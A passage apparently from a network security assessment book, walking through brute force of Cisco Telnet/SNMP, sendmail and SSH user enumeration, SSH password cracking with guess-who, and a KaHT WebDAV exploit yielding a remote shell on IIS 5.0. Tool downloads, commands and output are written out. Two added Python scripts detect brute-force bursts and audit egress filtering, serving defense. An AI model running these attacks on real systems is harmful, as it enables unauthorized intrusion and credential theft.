14.4 Network Service Testing

After investigating the potential low-level weaknesses within each accessible network service, I launch exploit scripts and attack techniques against each service to qualify and test the vulnerabilities.

14.4.1 Cisco IOS Router (

The router is susceptible to brute-force attack through its Telnet and SNMP services. A full-blown brute-force attack (which often takes days to complete) should be launched if initial brute-force attacks, using obvious common passwords, fail. Example 14-17 shows hydra in use to brute-force the Cisco IOS Telnet service password, using a list of default Cisco passwords from pass.txt.

Example 14-17. Performing initial Telnet brute force using Hydra
# cat pass.txt










# ./hydra -P pass.txt -e ns cisco
Hydra v2.4 (c) 2003 by van Hauser / THC - use allowed only for legal purposes.
Hydra is starting! [parallel tasks: 4, login tries: 11 (l:1/p:11)]
Hydra finished.

ADMsnmp is used to brute-force SNMP service read or write community strings of the router, as shown in Example 14-18.

Example 14-18. Performing initial SNMP brute force using ADMsnmp
# ./ADMsnmp
ADMsnmp vbeta 0.1 (c) The ADM crew
greets: !ADM, el8.org, ansia
>>>>>>>>>>> get req name=root  id = 2 >>>>>>>>>>>
>>>>>>>>>>> get req name=public   id = 5 >>>>>>>>>>>
>>>>>>>>>>> get req name=private  id = 8 >>>>>>>>>>>
>>>>>>>>>>> get req name=write  id = 11 >>>>>>>>>>>
>>>>>>>>>>> get req name=admin  id = 14 >>>>>>>>>>>
>>>>>>>>>>> get req name=proxy  id = 17 >>>>>>>>>>>
>>>>>>>>>>> get req name=ascend  id = 20 >>>>>>>>>>>
>>>>>>>>>>> get req name=cisco  id = 23 >>>>>>>>>>>
>>>>>>>>>>> get req name=router  id = 26 >>>>>>>>>>>
>>>>>>>>>>> get req name=shiva  id = 29 >>>>>>>>>>>
>>>>>>>>>>> get req name=enable  id = 32 >>>>>>>>>>>
>>>>>>>>>>> get req name=read  id = 35 >>>>>>>>>>>
>>>>>>>>>>> get req name=access  id = 38 >>>>>>>>>>>
>>>>>>>>>>> get req name=snmp  id = 41 >>>>>>>>>>>
>>>>>>>>>>> get req name=cable-docsis  id = 43 >>>>>>>>>>>
>>>>>>>>>>> get req name=ILMI  id = 45 >>>>>>>>>>>
<!ADM!>         snmp check on       <!ADM!>

Unfortunately, this initial Telnet and SNMP brute-force testing reveals that no common or default passwords are in use on this router. I could launch full-blown brute-force attacks against these services if I were desperate to compromise this device (which can take weeks to complete, depending on the size of the dictionary).

14.4.2 Solaris Mail Server (

No public exploit tools were found for the issues listed in MITRE CVE relating to Sendmail and OpenSSH services running on Solaris. In this case, there are three remote attacks that can be launched against the server.

  • Enumeration of local user accounts through Sendmail

  • Enumeration of local user accounts through OpenSSH (abusing CVE-2003-0190)

  • Brute force of weak user passwords through OpenSSH

Example 14-19 shows the rcpt2 tool (http://examples.oreilly.com/networksa/tools/rcpt2.c) in use against the Sendmail service, to identify local user accounts through multiple crafted RCPT TO: requests.

Example 14-19. Enumerating usernames through Sendmail
# ./rcpt2 users.txt
rcpt2 by B-r00t. (c) 2003.
Usernames from: users.txt
RCPT TO username enumeration on
BANNER: 220 mail ESMTP Sendmail 8.11.6+Sun/8.11.6; Thu, 20 Nov 2003
SEND: HELO doris.scriptkiddie.net
RECV: 250 mail Hello hacker [], pleased to meet you
SENT: mail from:<hax0r@doris.scriptkiddie.net>
RECV: 250 2.1.0 <hax0r@doris.scriptkiddie.net>... Sender ok
VALID_USER: sybase
Sending RSET & QUIT to
Ok Done!

Here I've identified the user accounts root and sybase. Example 14-20 shows how to launch a similar attack against the OpenSSH service, using ssh_brute.

Example 14-20. Downloading, building, and using ssh_brute
# wget ftp://sunsite.cnlab-switch.ch/pub/OpenBSD/OpenSSH/portable/
# tar xfz openssh-3.6.1p1.tar.gz
# wget http://examples.oreilly.com/networksa/tools/ssh_brute.tgz
# tar xvfz ssh_brute.tgz
# patch -p0 <openssh-3.6.1p1_brute.diff
patching file openssh-3.6.1p1/ssh.c
patching file openssh-3.6.1p1/sshconnect.c
patching file openssh-3.6.1p1/sshconnect1.c
patching file openssh-3.6.1p1/sshconnect2.c
# cd openssh-3.6.1p1
# ./configure
# make
# cc ../ssh_brute.c -o ssh_brute
# ./ssh_brute
 SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool
 Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved
 Usage: ./ssh_brute <protocol version> <user file> <host>
# make ssh
# ./ssh_brute 2 users.txt
 SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool
 Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved
 Testing an illegal user        : 0 second(s)
 Testing login root             : USER OK       [8 second(s)]
 Testing login test             : ILLEGAL       [0 second(s)]
 Testing login admin            : ILLEGAL       [0 second(s)]
 Testing login sybase           : USER OK       [7 second(s)]
 Testing login oracle           : ILLEGAL       [1 second(s)]
 Testing login informix         : ILLEGAL       [0 second(s)]

After identifying one interesting non-standard user account in particular (sybase), I proceed to use the TESO guess-who brute-force utility to grind the user password through the accessible SSH service. Example 14-21 shows the package being downloaded, built, and run.

Example 14-21. Installing and using guess-who
# wget http://packetstormsecurity.nl/groups/teso/guess-who-0.44.tgz
# tar xfz guess-who-0.44.tgz
# cd guess-who
# make
# ./b
guess-who SSH2 parallel passwd bruter (C) 2002 by krahmer
Usage: ./b <-l login> <-h host> [-p port] <-1|-2> [-N nthreads]
           [-n ntries]
Use -1 for producer/consumer thread model, -2 for dumb parallelism.
Passwds go on stdin. :)
# ./b -l sybase -h -1 < pass.txt
(!)128 ][ 00131 ][ 00000000.599880 ][   sybase ][        letmein ]

After 128 attempts, the tool finds that the user password is letmein. I can proceed to use ssh to authenticate and connect to the host, with the -T option to provide a level of cloaking (so that I don't appear in who listings, etc.):

# ssh -l sybase -T csh -i
sybase@'s password: letmein
Warning: no access to tty (Bad file descriptor).
Thus no job control in this shell.
mail% who
mail% id
uid=508(sybase) gid=509(sybase) groups=509(sybase)
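The router and mail server attacks in 14.4.1 and 14.4.2 (Telnet and SNMP password grinding, RCPT TO user enumeration, SSH user enumeration and password brute force) all leave the same footprint on the target side: a burst of authentication or recipient failures from one source, sometimes followed by a success. The following Python script is an added example for the defender's side of that story; it is not code from the book or from any of the tools shown above. It runs over constructed syslog lines (the hostnames, the 10.0.0.x addresses and the simplified sendmail rejection line are placeholders) and flags per-service failure bursts and the "many failed passwords, then a login" pattern that the guess-who run above would produce.

```python
import re
from collections import defaultdict

# Constructed sample syslog lines (not output from the book's tools). Hostnames,
# the 10.0.0.x addresses and the sendmail line shape are placeholders; real
# sendmail logs carry the relay address on a separate "from=" record.
SAMPLE_LOG = """\
Nov 20 10:01:02 router 12: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: cisco] [Source: 10.0.0.9] [localport: 23] [Reason: Login Authentication Failed] at 10:01:02 UTC Thu Nov 20 2003
Nov 20 10:01:03 router 13: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: cisco] [Source: 10.0.0.9] [localport: 23] [Reason: Login Authentication Failed] at 10:01:03 UTC Thu Nov 20 2003
Nov 20 10:01:04 router 14: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: cisco] [Source: 10.0.0.9] [localport: 23] [Reason: Login Authentication Failed] at 10:01:04 UTC Thu Nov 20 2003
Nov 20 10:01:05 router 15: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: ops] [Source: 10.0.0.20] [localport: 23] at 10:01:05 UTC Thu Nov 20 2003
Nov 20 10:02:10 router 16: %SNMP-3-AUTHFAIL: Authentication failure for SNMP req from host 10.0.0.9
Nov 20 10:02:11 router 17: %SNMP-3-AUTHFAIL: Authentication failure for SNMP req from host 10.0.0.9
Nov 20 10:02:12 router 18: %SNMP-3-AUTHFAIL: Authentication failure for SNMP req from host 10.0.0.9
Nov 20 10:02:13 router 19: %SNMP-3-AUTHFAIL: Authentication failure for SNMP req from host 10.0.0.9
Nov 20 10:05:00 mail sendmail[1201]: hAKA5001201: relay=[10.0.0.9], reject=550 5.1.1 <test@mail>... User unknown
Nov 20 10:05:01 mail sendmail[1201]: hAKA5001201: relay=[10.0.0.9], reject=550 5.1.1 <admin@mail>... User unknown
Nov 20 10:05:02 mail sendmail[1201]: hAKA5001201: relay=[10.0.0.9], reject=550 5.1.1 <oracle@mail>... User unknown
Nov 20 10:05:03 mail sendmail[1201]: hAKA5001201: relay=[10.0.0.9], reject=550 5.1.1 <informix@mail>... User unknown
Nov 20 10:05:30 mail sendmail[1202]: hAKA5001202: relay=[10.0.0.21], reject=550 5.1.1 <bob@mail>... User unknown
Nov 20 10:07:00 mail sshd[2201]: Illegal user test from 10.0.0.9
Nov 20 10:07:01 mail sshd[2202]: Illegal user admin from 10.0.0.9
Nov 20 10:07:02 mail sshd[2203]: Failed password for sybase from 10.0.0.9 port 40001 ssh2
Nov 20 10:07:03 mail sshd[2204]: Failed password for sybase from 10.0.0.9 port 40002 ssh2
Nov 20 10:07:04 mail sshd[2205]: Failed password for sybase from 10.0.0.9 port 40003 ssh2
Nov 20 10:07:05 mail sshd[2206]: Accepted password for sybase from 10.0.0.9 port 40004 ssh2
"""

# Each pattern names the service under attack and captures the source address
# (plus the account or recipient name where the message carries one).
PATTERNS = [
    ("telnet-login", re.compile(
        r"%SEC_LOGIN-4-LOGIN_FAILED: Login failed \[user: (?P<user>[^\]]*)\] \[Source: (?P<src>[\d.]+)\]")),
    ("snmp-community", re.compile(
        r"%SNMP-3-AUTHFAIL: Authentication failure for SNMP req from host (?P<src>[\d.]+)")),
    ("smtp-rcpt-enum", re.compile(
        r"sendmail\[\d+\]: \S+ relay=\[(?P<src>[\d.]+)\].*<(?P<user>[^@>]+)@[^>]*>\.\.\. User unknown")),
    ("ssh-user-enum", re.compile(
        r"sshd\[\d+\]: (?:Illegal|Invalid) user (?P<user>\S+) from (?P<src>[\d.]+)")),
    ("ssh-password", re.compile(
        r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>[\d.]+)")),
]

# A successful SSH login is interesting when it follows failures from the same source.
SSH_SUCCESS = re.compile(r"sshd\[\d+\]: Accepted \w+ for (?P<user>\S+) from (?P<src>[\d.]+)")


def classify(line):
    """Return (service, source, user) for a recognised failure line, else None."""
    for service, pattern in PATTERNS:
        m = pattern.search(line)
        if m:
            return service, m.group("src"), m.groupdict().get("user")
    return None


def detect(log_text, threshold=3):
    """Flag sources with at least `threshold` failures against one service, and SSH
    logins that succeed after that many failed passwords for the same account from
    the same source (the password-guessed-then-used pattern)."""
    failures = defaultdict(list)   # (service, src) -> attempted users, in order
    findings = []
    for line in log_text.splitlines():
        hit = classify(line)
        if hit:
            service, src, user = hit
            failures[(service, src)].append(user)
            continue
        m = SSH_SUCCESS.search(line)
        if m:
            src, user = m.group("src"), m.group("user")
            prior = failures[("ssh-password", src)].count(user)
            if prior >= threshold:
                findings.append({"kind": "success-after-failures", "service": "ssh-password",
                                 "src": src, "count": prior, "users": [user]})
    for (service, src), users in sorted(failures.items()):
        if len(users) >= threshold:
            findings.append({"kind": "burst", "service": service, "src": src,
                             "count": len(users), "users": sorted({u for u in users if u})})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"{f['kind']:24} {f['service']:16} {f['src']:10} {f['count']:3}  {','.join(f['users'])}")
```

The threshold is deliberately low because the sample is short; in production the count would be taken per source over a sliding time window, and the single-recipient rejection from 10.0.0.21 shows why a raw "User unknown" match is not enough on its own. The SSH user-enumeration lines stay below the threshold here, which is the point: timing-based enumeration like CVE-2003-0190 produces few log lines per probe, so that signal needs a lower bar or correlation with the other services than a password grind does.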

14.4.3 Windows 2000 Web Server (

Vulnerabilities fall into two categories: simple logic flaws and memory manipulation bugs. Two of the seven relevant remote issues relating to IIS 5.0 are simple logic flaws that rely on Unicode and double-encoding of characters to perform directory traversal. The remaining five are memory manipulation bugs, which use buffer overflows to influence logical program flow on the remote server.

The Unicode and double-encoding directory traversal bugs (CVE-2000-0884 and CVE-2001-0333) can be identified using an automated web scanner, such as nikto or N-Stealth. By analyzing the results, I find that the server isn't susceptible to these issues.

The existence and scope of memory manipulation bugs can be fully qualified only by launching exploit scripts and proof-of-concept tools to solicit a positive response (such as an interactive command shell or a directory listing). It may be the case that, even though the server is vulnerable to a given bug, egress filtering of traffic prevents connect-back shellcode from working.

In the case of the IIS 5.0 web service at, the exploit scripts for the following bugs weren't successful:

  • .printer overflow

  • .ida and .idq overflow

  • .asp chunked encoding overflow

When running the KaHT exploit script to test for the presence of the ntdll.dll IIS WebDAV overflow, I see a positive response, as shown in Example 14-22.

Example 14-22. Using KaHT to compromise the IIS 5.0 server
D:\KaHT_public> KaHT 53 0
. .. ...: Webdav exploit & Scanner (aT4r@3wdesign.es) :... ...
 Checking Servers.   IP                 Connect IIS 5.0 WEBDAV
 Connecting to host:   [OK]    [OK]    [OK]
 [+] Aceptando conexiones en el puerto 53
 [+] Lets go dude =)
 [+] 1 Unhacked Servers Remaining
 [+] Trying Ip:      Ret=0x00c000c0
 [+] Trying Ip:      Ret=0x00c200c2
 [+] Incoming Conection from accepted
 [+] Press Enter to Continue. type "exit" to return to scan
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
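The WebDAV compromise above only works because the web server is allowed to open an outbound connection back to the attacker (KaHT listens on port 53, a port that egress rules frequently leave open because it looks like DNS), which is exactly the egress-filtering caveat raised earlier in 14.4.3. The following Python script is an added example of checking for that condition from the defender's side; it is not from the book or from KaHT. It audits constructed, iptables-style outbound connection records for a DMZ web server against an explicit egress allow-list (the 192.0.2.x and 198.51.100.x addresses are documentation-range placeholders), and renders the same allow-list as iptables rules ending in a default drop.

```python
import re

# Constructed egress policy for a DMZ web server (placeholder addresses, not
# from the book): the only outbound connections the host is expected to make.
WEB_SERVER = "192.0.2.10"
EGRESS_ALLOW = {
    # (proto, dst_port): permitted destinations
    ("udp", 53): {"192.0.2.2", "192.0.2.3"},   # DMZ resolvers
    ("tcp", 53): {"192.0.2.2", "192.0.2.3"},   # same resolvers, TCP fallback
    ("tcp", 25): {"192.0.2.20"},               # outbound mail relay
}

# Constructed firewall log of outbound connection attempts (iptables-style text,
# trimmed to the fields used here). The third line has the shape a connect-back
# shell on a DNS port would take; the last line is another host and is ignored.
SAMPLE_FLOWS = """\
Nov 20 11:00:01 fw kernel: OUT=eth1 SRC=192.0.2.10 DST=192.0.2.2 PROTO=UDP SPT=1035 DPT=53
Nov 20 11:00:02 fw kernel: OUT=eth1 SRC=192.0.2.10 DST=192.0.2.20 PROTO=TCP SPT=1036 DPT=25 SYN
Nov 20 11:00:05 fw kernel: OUT=eth1 SRC=192.0.2.10 DST=198.51.100.7 PROTO=TCP SPT=1037 DPT=53 SYN
Nov 20 11:00:09 fw kernel: OUT=eth1 SRC=192.0.2.10 DST=198.51.100.7 PROTO=TCP SPT=1038 DPT=80 SYN
Nov 20 11:00:12 fw kernel: OUT=eth1 SRC=192.0.2.11 DST=198.51.100.9 PROTO=TCP SPT=2001 DPT=443 SYN
"""

FLOW = re.compile(
    r"SRC=(?P<src>[\d.]+) DST=(?P<dst>[\d.]+) PROTO=(?P<proto>\w+) SPT=\d+ DPT=(?P<dport>\d+)")


def audit_egress(log_text, server, policy):
    """Return the outbound flows originated by `server` that `policy` does not allow.

    A flow is a violation either because no rule exists for its (proto, port) at
    all, or because a rule exists but the destination is not on its list; the
    second case is the one a connect-back on a "DNS" port falls into."""
    violations = []
    for line in log_text.splitlines():
        m = FLOW.search(line)
        if not m or m.group("src") != server:
            continue
        proto, port, dst = m.group("proto").lower(), int(m.group("dport")), m.group("dst")
        allowed = policy.get((proto, port))
        if allowed is None:
            reason = "no egress rule"
        elif dst not in allowed:
            reason = "destination not permitted"
        else:
            continue
        violations.append({"dst": dst, "proto": proto, "port": port, "reason": reason})
    return violations


def render_iptables(server, policy):
    """Emit the policy as an explicit per-destination allow-list for `server`,
    closed by a default drop, so that any outbound connection the policy does
    not name (connect-back shells included) simply fails to connect."""
    rules = []
    for (proto, port), dsts in sorted(policy.items()):
        for dst in sorted(dsts):
            rules.append(
                f"iptables -A FORWARD -s {server} -d {dst} -p {proto} --dport {port} -j ACCEPT")
    rules.append(f"iptables -A FORWARD -s {server} -j DROP")
    return rules


if __name__ == "__main__":
    for v in audit_egress(SAMPLE_FLOWS, WEB_SERVER, EGRESS_ALLOW):
        print(f"{WEB_SERVER} -> {v['dst']} {v['proto']}/{v['port']}: {v['reason']}")
    print("\n".join(render_iptables(WEB_SERVER, EGRESS_ALLOW)))
```

The audit treats every logged SYN as a new connection and does not try to reassemble sessions, which is enough to answer the question the text raises: would a successful overflow on this host have been able to call home? A policy that only permits "port 53 anywhere" would pass the third flow; naming the resolvers as destinations is what turns the rule into real egress filtering.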